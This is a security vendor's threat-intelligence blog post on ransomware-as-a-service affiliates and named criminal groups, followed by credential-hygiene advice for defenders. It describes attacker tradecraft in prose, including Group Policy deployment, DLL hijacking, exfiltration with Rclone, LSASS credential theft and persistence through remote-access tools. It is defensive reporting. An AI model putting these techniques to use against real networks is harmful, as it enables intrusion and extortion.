Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.
That depth of signal intelligence gathered from various domains—identity, email, data, and cloud—provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated “cut” from their tool’s success.
The cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there’s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.
Within this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term “human-operated ransomware” to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target’s network.
Unlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries—for example, a security product that isn‘t configured to prevent tampering or a service that’s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them—with no guarantee they’ll leave their target environment once they’ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren’t successfully evicted.
Ransomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.
All human-operated ransomware campaigns—all human-operated attacks in general, for that matter—share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization’s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.**
In this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here’s a quick table of contents:
1. **How RaaS redefines our understanding of ransomware incidents**
* The RaaS affiliate model explained
* Access for sale and mercurial targeting
2. **“Human-operated” means human decisions**
* Exfiltration and double extortion
* Persistent and sneaky access methods
3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**
4. **Defending against ransomware: Moving beyond protection by detection**
* Building credential hygiene
* Auditing credential exposure
* Prioritizing deployment of Active Directory updates
* Cloud hardening
* Addressing security blind spots
* Reducing the attack surface
* Hardening internet-facing assets and understanding your perimeter
## How RaaS redefines our understanding of ransomware incidents
With ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the “human-operated” aspect of these attacks—attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.
In the past, we’ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.
Reporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.
We know, for example, that the underlying techniques used in human-operated ransomware campaigns haven’t changed very much over the years—attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there’s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it’s only possible on the most critical assets and segments of the network.
Without the ability to steal access to highly privileged accounts, attackers can’t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.
In the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.
### The RaaS affiliate model explained
The cybercriminal economy—a connected ecosystem of many players with different techniques, goals, and skillsets—is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker’s skills.
RaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services
RaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads—further muddying the waters when it comes to tracking the criminals behind these actions.
Figure 1. How the RaaS affiliate model enables ransomware attacks
### Access for sale and mercurial targeting
A component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a “load”. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to “bank” for later profit. Some advertisements for the sale of initial access specifically cite that a system isn’t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.
Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn’t manifest itself as specifically attacking the target’s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.
In some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a “jump server” to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren’t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.
## “Human-operated” means human decisions
Microsoft coined the term “human-operated ransomware” to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks—including objectives and pre-ransom activity—evolve depending on the environment and the unique opportunities identified by the attackers.
These attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.
After the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator’s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker’s next steps.
If there’s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker.
This human decision-making early in the reconnaissance and intrusion stages means that even if a target’s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks “in production” from an undetected location in their target’s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.
### Exfiltration and double extortion
Ransomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and “double extortion,” which refers to attackers threatening to leak data if a ransom hasn’t been paid, has also become a common tactic among many RaaS affiliate programs—many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.
This trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don’t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below.
### Persistent and sneaky access methods
Paying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers’ demands doesn’t guarantee that attackers ever “pack their bags” and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren’t successfully evicted.
The handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.
Some of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:
* AnyDesk
* Atera Remote Management
* ngrok.io
* Remote Manipulator System
* Splashtop
* TeamViewer
Another popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol’s security, and add new users to the Remote Desktop Users group.
The time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can’t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can’t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.
Figure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022
The human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.
## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks
For organizations to successfully respond to evict an active attacker, it’s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it’s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.
In the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:
* DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today
* ELBRUS: (Un)arrested development
* DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs
* DEV-0237: Prolific collaborator
* DEV-0206 and DEV-0243: An “evil” partnership
* DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate
* DEV-0537: From extortion to destruction
Microsoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled “Ransomware-linked emerging threat activity group detected”. We also add the note “Ongoing hands-on-keyboard attack” to alerts that indicate a human attacker is in the network. When these alerts are raised, it’s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.
A note on threat actor naming: as part of Microsoft’s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a “development group”. We use a naming structure with a prefix of “DEV” to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use “contractors,” who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.
### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today
A vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter’s shutdown in June 2021, and Ryuk’s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today.
DEV-0193’s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.
A subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444.
The leaked chat files from a group publicly labeled as the “Conti Group” in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload—even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the “Conti Group,” even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates—and the one responsible for developing the “Conti Manual” leaked in August 2021—is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.
### ELBRUS: (Un)arrested development
ELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.
In 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.
ELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called “Combi Security” and “Bastion Security” to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.
In 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn’t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.
ELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.
While they aren’t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server.
### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs
An excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the “REvil gang” or “BlackCat ransomware group”. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment.
Figure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022
DEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren’t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older “fully owned” ransomware payloads like Phobos, which they can buy when a RaaS isn’t available, or they don’t want to pay the fees associated with RaaS programs.
DEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren’t protected with tamper protection.
DEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.
### DEV-0237: Prolific collaborator
Like DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.
After the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn’t want Hive’s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.
_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_
Beyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237’s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.
Figure 5. Examples of DEV-0237’s relationships with other cybercriminal activity groups
Like all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.
### DEV-0206 and DEV-0243: An “evil” partnership
Malvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.
Once successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as “EvilCorp,” The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware’s inner payloads. In DEV-0243’s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.
Around November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the “EvilCorp” activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status.
Figure 6. The handover from DEV-0206 to DEV-0243
### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate
Differing from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)
DEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.
Once inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.
Figure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022
Because DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).
Like many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift—possibly related to victim payment issues—DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.
### DEV-0537: From extortion to destruction
An example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.
Once initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn’t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks.
DEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim’s data and resources.
## Defending against ransomware: Moving beyond protection by detection
A durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks.
Attackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven’t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.
Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.
### Building credential hygiene
More than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.
Credential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn’t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.
Too often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven’t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.
**Here are some steps organizations can take to build credential hygiene:**
* Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can’t be used to move laterally. Run services as Network Service when accessing other resources.
* Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.
* Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn’t be exposed on member servers or workstations.
